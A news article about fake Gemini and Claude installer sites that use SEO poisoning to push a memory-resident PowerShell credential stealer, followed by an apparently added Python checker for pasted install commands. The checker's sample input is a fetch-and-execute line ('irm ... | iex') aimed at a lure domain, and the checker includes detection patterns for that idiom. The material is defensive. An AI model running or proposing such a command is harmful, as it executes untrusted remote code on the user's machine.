Trojanized Gemini and Claude Installers Target Developers Via SEO Poisoning


HackRead, May 26, 2026

Why It Matters

The attack compromises development environments, giving threat actors access to corporate credentials and infrastructure, and underscores the growing supply‑chain risk of AI‑tool adoption.

Key Takeaways

  • Fake Gemini/Claude sites rank top via SEO poisoning
  • Malware installs real CLI while stealing credentials in memory
  • Targets browsers, collaboration apps, VPN configs, crypto wallets
  • Uses stolen EV certificate to bypass Windows warnings
  • Over 30 typosquatted domains lure developers to malicious installers

Pulse Analysis

Search engine optimization (SEO) poisoning has become a potent vector for delivering malware to technically savvy audiences. By registering domains that closely resemble legitimate AI‑tool URLs—such as geminicli.co.com and claudecode.co.com—attackers manipulate Google’s ranking algorithms to appear at the top of search results. Developers, eager to experiment with cutting‑edge models, often copy‑paste the advertised PowerShell command without verifying the source, inadvertently triggering a download from a malicious server. This tactic demonstrates how trust in search results can be weaponized, especially when the fake pages replicate official documentation verbatim.

The payload itself is a file‑less, memory‑resident infostealer written in PowerShell. It first disables Windows defenses like AMSI and ETW, then harvests a broad spectrum of data: browser credentials, session cookies from Slack, Teams, Zoom, and other collaboration tools, VPN configuration files, and private keys from crypto wallets such as Brave and Spectre. By installing the genuine Gemini CLI in the background, the malware masks its activity while maintaining persistence. The stolen information is encrypted and exfiltrated to multiple C2 domains, enabling attackers to pivot from passive data theft to active remote‑code execution within compromised corporate networks.

For developers and security teams, the incident highlights the necessity of strict download hygiene and supply‑chain verification. Always obtain tools directly from vendor‑owned domains, employ hash verification, and scan binaries with services like VirusTotal before execution. Organizations should also enforce endpoint protection that monitors PowerShell behavior and blocks unsigned scripts, even when they appear to originate from trusted installers. As AI utilities proliferate, the attack surface expands, making proactive credential management and zero‑trust network policies essential to mitigate the risk of similar SEO‑driven campaigns.
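The download-hygiene advice above can be made mechanical before a pasted one-liner is run. The following is an added example, not code from HackRead or from either vendor: it flags commands that pipe fetched content straight into Invoke-Expression, classifies the download host against a team allowlist (the approved hosts here are placeholders), treats unlisted hosts carrying the product names as lookalikes (the lure hostnames are the ones the article names), and checks a file's SHA-256 against a vendor-published digest.

```python
"""Pre-execution checks for a copy-pasted AI-tool install command."""
import hashlib
import hmac
import re
from urllib.parse import urlparse

# Placeholder allowlist: replace with the hosts your vendor actually publishes.
APPROVED_HOSTS = {"cli.vendor.example", "downloads.vendor.example"}
# Product names impersonated by the campaign (geminicli.co.com, claudecode.co.com).
BRAND_WORDS = ("gemini", "claude")
URL_RE = re.compile(r"https?://[^\s'\"|;)]+")
# PowerShell idioms that execute downloaded text with nothing on disk to hash.
PIPE_TO_EXEC_RE = re.compile(r"\|\s*(iex|invoke-expression)\b", re.IGNORECASE)


def classify_host(url: str, approved=APPROVED_HOSTS) -> str:
    """'approved' for an allowlisted host, 'lookalike' for an unlisted host
    that carries a brand name (the .co.com trick), else 'unknown'."""
    host = (urlparse(url).hostname or "").lower().rstrip(".")
    if host in approved:
        return "approved"
    if any(word in host for word in BRAND_WORDS):
        return "lookalike"
    return "unknown"


def audit_command(cmd: str) -> list[str]:
    """Return the reasons a pasted one-liner should not be run as-is."""
    reasons = []
    if PIPE_TO_EXEC_RE.search(cmd):
        reasons.append("pipes downloaded content straight into Invoke-Expression")
    urls = URL_RE.findall(cmd)
    if not urls:
        reasons.append("no download URL found to verify")
    for url in urls:
        verdict = classify_host(url)
        if verdict != "approved":
            reasons.append(f"{verdict} download host: {urlparse(url).hostname}")
    return reasons


def verify_sha256(payload: bytes, expected_hex: str) -> bool:
    """Constant-time comparison of a downloaded file's digest with the
    value the vendor publishes beside the installer."""
    digest = hashlib.sha256(payload).hexdigest()
    return hmac.compare_digest(digest, expected_hex.strip().lower())


if __name__ == "__main__":
    # Constructed inputs: the lure pattern (no real payload) vs. an approved-host download.
    print(audit_command("irm https://geminicli.co.com/install.ps1 | iex"))
    print(audit_command("Invoke-WebRequest https://cli.vendor.example/setup.msi -OutFile setup.msi"))
```

An empty list from `audit_command` only means the host and execution pattern passed; the downloaded file still needs `verify_sha256` against the vendor's published digest before it is run.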

